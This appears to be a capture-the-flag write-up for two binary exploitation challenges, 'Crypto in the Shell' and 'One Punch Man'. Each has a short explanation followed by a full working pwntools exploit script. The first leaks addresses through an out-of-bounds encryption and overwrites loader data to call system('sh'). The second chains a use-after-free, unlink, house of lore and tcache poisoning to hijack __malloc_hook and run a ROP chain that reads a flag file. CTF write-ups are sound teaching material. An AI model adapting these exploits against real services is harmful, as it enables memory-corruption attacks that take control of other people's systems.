Crypto in the Shell

The vulnerability is simple: the encryption routine allows out-of-bounds access. We can encrypt a piece of memory at an arbitrary offset, and the result of the encryption is printed. Here are the steps to exploit it:

  1. Encrypt the key, and the result of encryption will be shown, which is the new key
  2. Encrypt the offset -0x3a0, decrypt the result to leak the program address
  3. Similarly, encrypt the offset -0x40 to leak the libc address, since that location stores stderr. Note that we cannot use stdout or stdin to leak the libc address, since they are being used by the program and changing their contents will cause a crash
  4. Use libc_addr+0x3f04c0 to leak a stack address; then we can rewrite the loop variable i to bypass the limit on the number of encryptions. However, because of ASLR, we only have a 1/2 probability of making i negative
  5. Brute-force byte by byte to rewrite ld_addr+0x228968 to "sh" and ld_addr+0x228f60 to &system. Because of the remote timeout, we need to pre-calculate the number of encryptions needed to obtain each byte and send the payloads all at once
  6. exit to get the shell
from pwn import *
from random import *
from time import time
from hashlib import *
from Crypto.Cipher import AES
from binascii import *

# Not referenced elsewhere in the visible script; the block size is written
# as 0x10 at the places where it is needed.
AES_BLOCK_SIZE = 16
# 1 = spawn ./chall locally and attach gdb, 0 = connect to the remote service.
g_local=1
context(log_level='debug', arch='amd64')
# Local libc image; the script only reads symbol offsets from it
# (_IO_2_1_stderr_ and system).
e = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
if g_local:
	sh = process("./chall")
	gdb.attach(sh)
else:
	sh = remote("3.113.219.89", 31337)

def enc(off, size=0xf):
	"""Ask the target to encrypt `size` bytes at `off` and return its output.

	Both numbers are reduced modulo 2**64 before being sent as decimal text,
	so a negative offset goes out as its unsigned 64-bit representation.
	Everything received up to (but excluding) the next "offset:" prompt is
	returned; its length must be a multiple of 16.
	"""
	u64_mask = (1 << 64) - 1
	prompt = "offset:"
	sh.sendline(str(off & u64_mask))
	sh.sendlineafter("size:", str(size & u64_mask))
	reply = sh.recvuntil(prompt)
	ciphertext = reply[:-len(prompt)]
	assert len(ciphertext) % 0x10 == 0
	return ciphertext

# Step 1 of the writeup: encrypting the key in place makes the target print
# the ciphertext, which is also the key it now holds (offset -0x20).
key = enc(-0x20)
# 16 zero bytes used as the CBC IV by dec()/enc2().
# NOTE(review): presumably matches the IV the target uses -- confirm.
iv = 0x10 * '\x00'
def dec(data):
	"""Decrypt `data` locally with AES-CBC using the global key and iv."""
	cipher = AES.new(key, AES.MODE_CBC, iv)
	return cipher.decrypt(data)
def enc2(data):
	"""Encrypt `data` locally with AES-CBC using the global key and iv."""
	cipher = AES.new(key, AES.MODE_CBC, iv)
	return cipher.encrypt(data)

# Step 2: have the target encrypt the block at offset -0x3a0, then decrypt
# the printed ciphertext locally to recover what was stored there.
prog_addr = dec(enc(-0x3a0))
# The second qword is treated as a pointer to program base + 0x202008.
prog_addr = u64(prog_addr[8:]) - 0x202008
print hex(prog_addr)


# Step 3: same trick at offset -0x40, which per the writeup holds stderr.
libc_addr = dec(enc(-0x40))
# The first qword is treated as the address of _IO_2_1_stderr_ inside libc.
libc_addr = u64(libc_addr[:8]) - e.symbols["_IO_2_1_stderr_"]
print hex(libc_addr)

def calc_off(addr):
	"""Turn an absolute address into an offset usable with enc().

	The offset is measured from program base + 0x2023a0.
	"""
	origin = prog_addr + 0x2023a0
	return addr - origin

# Step 4: libc_addr+0x3f04c0 is used to leak a stack address.
env_off = calc_off(libc_addr+0x3f04c0)

stack_addr = dec(enc(env_off))
# Adjust the leaked pointer by +0x10 - 0x120.
# NOTE(review): presumably this lands on the block containing the loop
# counter i -- confirm against the binary.
stack_addr = u64(stack_addr[:8]) + 0x10 - 0x120
print hex(stack_addr)

# 0.5, need to make i negative
# Encrypting that stack block in place replaces i; per the writeup the run
# only continues past the encryption limit when i ends up negative.
enc(calc_off(stack_addr))


# previous bytes might be affected
def write_byte(addr, val, data):
	"""Force the byte at `addr` to `val` by repeatedly encrypting in place.

	`data` is the current content of the 16-byte block ending at `addr`.
	The number of encryptions needed is first found locally with enc2();
	then that many requests are sent back to back before any reply is read.
	The other 15 bytes of the block are scrambled as a side effect.

	Returns the block content after the final encryption.
	"""
	assert len(data) == 0x10
	off = calc_off(addr - 0xf)
	request = str(off) + '\n15\n'

	# Local simulation: at least one round is always performed.
	rounds = 1
	data = enc2(data)
	while u8(data[0xf]) != val:
		data = enc2(data)
		rounds += 1

	# Send everything first, then drain one prompt per request.
	for _ in xrange(rounds):
		sh.send(request)
	for _ in xrange(rounds):
		sh.recvuntil("offset:")
	return data

# Base used for the ld_addr+... targets named in the writeup.
# NOTE(review): assumes this region sits at a fixed 0x3f1000 from the libc
# base -- confirm for the target environment.
ld_addr = libc_addr + 0x3f1000

def write_bytes(addr, s, data):
	"""Write the bytes of `s` to `addr`, one write_byte() call per byte.

	`data` models the memory from addr-0x10 up to the end of the target, so
	its length must be 0x10 + len(s). Bytes are written from last to first
	because each write_byte() call scrambles the 15 bytes before its target.
	Nothing is returned.
	"""
	assert len(data) == 0x10 + len(s)
	for pos in reversed(range(len(s))):
		lo = pos + 1
		hi = pos + 0x11
		# 16-byte window ending at addr + pos
		window = write_byte(addr + pos, u8(s[pos]), data[lo:hi])
		data = data[:lo] + window + data[hi:]

# Debug helper (disabled): dump the qword at ld_addr + 0x228f50.
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f50)))[:8]))
# sh.interactive()
# Step 5: od1/od2 are the assumed current contents of the 16 bytes in front
# of each target; write_bytes() needs them to simulate the encryptions.
od1 = p64(0) + p64(1)
# Put "sh" at ld_addr + 0x228968 (the two target bytes are assumed to be 0).
write_bytes(ld_addr + 0x228968, "sh", od1 + 2*'\x00')
od2 = p64(0) + p64(0)
# Replace the low 3 bytes of the pointer at ld_addr + 0x228f60 with those of
# system; the pointer is assumed to currently hold ld_addr + 0x10e0.
write_bytes(ld_addr + 0x228f60, \
	p64(libc_addr + e.symbols["system"])[:3], \
	od2+p64(ld_addr+0x10e0)[:3])
# local 0x440->0x441
# remote 0x440->0x496

# Debug helpers (disabled): print system's address and re-read both targets.
# print hex(libc_addr + e.symbols["system"])
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f60)))[:8]))
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228968)))[:8]))

# Step 6: hand control to the user; exiting the program gives the shell.
sh.interactive()

One Punch Man

The vulnerability is a simple UAF, and the resulting leaks are very easy. However, normal allocation only uses calloc, which does not take chunks from tcache, and the allowed sizes rule out fastbin chunks as well as unsorted-bin chunks that would not be inserted into tcache. The hidden function allows malloc(0x217), but only when the 0x220 tcache count is larger than 6, so we cannot simply overwrite fd to achieve an arbitrary write.

Initially we tried an unsorted bin attack, but it seems that an unsorted bin attack requires a chunk that will not be put into tcache. Then I tried house of lore to allocate a chunk in the tcache arena; however, the program crashes in memset because the size passed to memset is too large. The root cause is that calloc uses chunk_size-0x10 as the size argument of memset, and chunk_size can only be 0 or a heap address, which always gives a size that is far too large.

The solution is to first use unlink to rewrite the 0x220 tcache pointer to &pointer - 0x18, so that we can allocate a chunk in the tcache arena and fake a 0x10 chunk size there. Then we use the house of lore attack again, and this time the size passed to memset is 0x10-0x10=0, which does not cause any crash.

Then it is easy to rewrite the 0x220 tcache pointer while still keeping the tcache count at 7; by then calling malloc(0x217) we can achieve an arbitrary memory write. We can overwrite __malloc_hook and perform ROP, since the stack contents are controllable.

from pwn import *

# Not referenced anywhere in the visible part of this script.
AES_BLOCK_SIZE = 16
# 1 = run ./one_punch locally under gdb, 0 = connect to the remote service.
g_local=0
context(log_level='debug', arch='amd64')
# libc shipped with the challenge; used below for symbol offsets.
e = ELF("./libc.so.6")
if g_local:
	# LD_LIBRARY_PATH="." so the local process loads libraries from the
	# current directory.
	sh = process("./one_punch", env={"LD_LIBRARY_PATH":"."})
	gdb.attach(sh)
else:
	sh = remote("52.198.120.1", 48763)

def ce(cmd, idx, name):
	"""Shared driver for the menu commands that take an index and a name.

	Sends the NUL-terminated command, answers the "idx: " and "name: "
	prompts, then waits for the next "> " menu prompt.
	"""
	nul = '\x00'
	sh.send(cmd + nul)
	answers = (("idx: ", str(idx) + nul), ("name: ", name))
	for prompt, payload in answers:
		sh.sendafter(prompt, payload)
	sh.recvuntil("> ")

def create(idx, name):
	"""Menu command '1': store `name` in slot `idx`."""
	return ce('1', idx, name)


def edit(idx, name):
	"""Menu command '2': overwrite the content of slot `idx` with `name`."""
	return ce('2', idx, name)

def show(idx):
	"""Menu command '3': return the bytes printed for slot `idx`.

	The returned value is whatever appears between "name: " and the
	"\\n####" that follows it; the next "> " prompt is consumed as well.
	"""
	terminator = "\n####"
	sh.send('3\x00')
	sh.sendafter("idx: ", str(idx) + '\x00')
	sh.recvuntil("name: ")
	raw = sh.recvuntil(terminator)
	sh.recvuntil("> ")
	return raw[:-len(terminator)]

def delete(idx):
	"""Menu command '4': free slot `idx`.

	Returns everything received up to and including the next "> " prompt.
	"""
	idx_field = str(idx) + '\x00'
	sh.send('4\x00')
	sh.sendafter("idx: ", idx_field)
	menu_output = sh.recvuntil("> ")
	return menu_output

def punch(data="a"):
	"""Invoke the hidden menu option 50056 and send `data` to it.

	The option number is sent NUL-padded to 8 bytes, followed directly by
	`data`; the call then waits for the next "> " prompt. Per the writeup
	this is the path that performs malloc(0x217).
	"""
	choice = "50056" + 3 * '\x00'
	sh.send(choice)
	sh.send(data)
	sh.recvuntil("> ")

# Leak stage. Slots remain usable after delete() (the UAF), so show() on a
# freed slot prints whatever the allocator left inside the chunk.
create(0, '0' * 0x217)
create(1, '1' * 0x217)

delete(0)
delete(1)

# The freed slot 1 yields a heap pointer (padded with two NUL bytes to a
# full qword); subtracting 0x260 gives the heap base used below.
heap_addr = u64(show(1) + '\x00\x00') - 0x260

# Five more frees of the same size; together with the two above this makes
# seven. NOTE(review): presumably this fills the 0x220 tcache bin -- confirm.
for i in xrange(5):
	create(0, '2' * 0x217)
	delete(0)

# Slot 1 is allocated after slot 0 and stays allocated while slot 0 is freed.
# NOTE(review): presumably the eighth free goes to the unsorted bin, with
# slot 1 keeping it from merging into the top chunk -- confirm.
create(0, '2' * 0x217)
create(1, '3' * 0x217)
delete(0)

# The freed slot 0 yields a libc pointer; 0x1e4ca0 is its offset from the
# libc base for the libc in use.
libc_addr = u64(show(0)+'\x00\x00') - 0x1e4ca0
print hex(heap_addr),hex(libc_addr)
delete(1)

# Unlink stage (see the writeup): redirect the 0x220 tcache pointer to
# &pointer - 0x18.
punch() # consume 1 tcache
create(0, 'T' * 0x217)
delete(0)
# Zero the first two qwords of the freed chunk through the dangling slot so
# that the same slot can be freed a second time.
edit(0, p64(0)*2)
delete(0)
# now top chunk + 0x10 == top elem in 0x220

for i in xrange(3):
	create(i, 'U' * 0x217)
for i in xrange(3):
	delete(i) # all merged to top

# Fake free chunk: prev_size 0, size 0x211, then fd/bk chosen for the unlink
# as &pointer - 0x18 and &pointer - 0x10, with pointer = heap_addr + 0x150.
# NOTE(review): heap_addr + 0x150 is presumably the 0x220 tcache entry slot.
fake_chunk = p64(0) + p64(0x211)
fake_chunk += p64(heap_addr + 0x150 - 0x18)
fake_chunk += p64(heap_addr + 0x150 - 0x10)
# Pad to 0x210 bytes, then append the header of the following chunk:
# prev_size 0x210 and size 0x600 (low bit clear).
fake_chunk = fake_chunk.ljust(0x210, 'F')
fake_chunk += p64(0x210) + p64(0x600)

create(0, cyclic(0x400))
# Overwrite the start of slot 0's chunk with the fake layout.
edit(0, fake_chunk)
# 0x220 <- 0x200 top
# +0x1e0 <- g[2].ptr
create(2, cyclic(0x400))

# current heap layout:
# 0x400 chunk
# [fake 0x210 chunk + 0x600 chunk head, whose next is top]
# 0x400 chunk

delete(1) # unlink trigger, things merged to top

# The hidden malloc now returns memory inside the tcache arena (result of
# the unlink above); 0x28 is written there as a fake size field.
punch(p64(0x28))
# fake chunk_size for smallbin attack
# otherwise calloc will crash in memset

create(0, '7' * 0x217)
delete(0) # fill 0x220 tcache

# consolidate topchunk
for i in xrange(6):
	create(0, '4' * 0x1f0)
	delete(0)

create(1, 'P' * 0x217) # create a padding
create(0, '4' * 0x1f0) # last tcache chunk

delete(0) # put it to tcache
edit(0, p64(0) + p64(0))
# rewrite fd and key to bypass double free check

delete(0) # to topchunk
delete(1) # to topchunk

# now 0x200 -> 7, top element is behind topchunk
# now 0x220 -> 7

create(0, '5' * 0x220)
create(0, '4' * 0x1f0) # chunk_head == top at 0x200
create(1, '5' * 0x200)

delete(0)
create(1, '5' * 0x200) # put to smallbin

# House of lore (see the writeup): corrupt the links of the freed chunk
# through the dangling slot 0 so an allocation lands at heap_addr + 0x130.
# NOTE(review): libc_addr+0x1e4e90 is presumably the matching small-bin head
# in main_arena -- confirm for this libc.
edit(0, p64(libc_addr+0x1e4e90) + p64(heap_addr+0x130))
delete(1)
edit(1, p64(0)*2 + p64(heap_addr+0x130))

create(0, 'C' * 0x1f0)
# This allocation's content starts with 0x10 filler bytes followed by the
# address of __malloc_hook, NUL-padded to 0x1e0 bytes. Per the writeup this
# rewrites the 0x220 tcache pointer while its count stays at 7.
create(0, 'A' * 0x10 + p64(libc_addr + \
	e.symbols["__malloc_hook"]).ljust(0x1e0, '\x00'))

# add rsp,48; ret
# The hidden malloc returns __malloc_hook: the hook is overwritten with the
# gadget above and the string "flag\x00" is placed right after it, at
# __malloc_hook + 8.
punch(p64(libc_addr + 0x8cfd6) + "flag\x00")

# Gadget addresses inside libc, named after the register they load.
# pop_rcx is defined but not used in the chain below.
pop_rdi = p64(libc_addr + 0x26542)
pop_rsi = p64(libc_addr + 0x26f9e)
pop_rdx = p64(libc_addr + 0x12bda6)
pop_rcx = p64(libc_addr + 0x10b31e)

# syscall(2, "flag", 0): syscall number 2 is open on x86-64 Linux; the path
# pointer is the "flag" string stored at __malloc_hook + 8.
rop = pop_rdi + p64(2)
rop += pop_rsi
rop += p64(libc_addr + e.symbols["__malloc_hook"] + 8)
rop += pop_rdx + p64(0)
rop += p64(libc_addr + e.symbols["syscall"])
# read(3, heap_addr + 0x2000, 0x100) -- assumes the file was opened as fd 3.
rop += pop_rdi + p64(3)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["read"])
# write(1, heap_addr + 0x2000, 0x100): send the buffer to stdout.
rop += pop_rdi + p64(1)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["write"])
rop += p64(0)

# The chain is sent as the name of a normal create(). Per the writeup, the
# stack contents are controllable, and the __malloc_hook gadget pivots into
# this chain.
create(0, rop)

sh.interactive()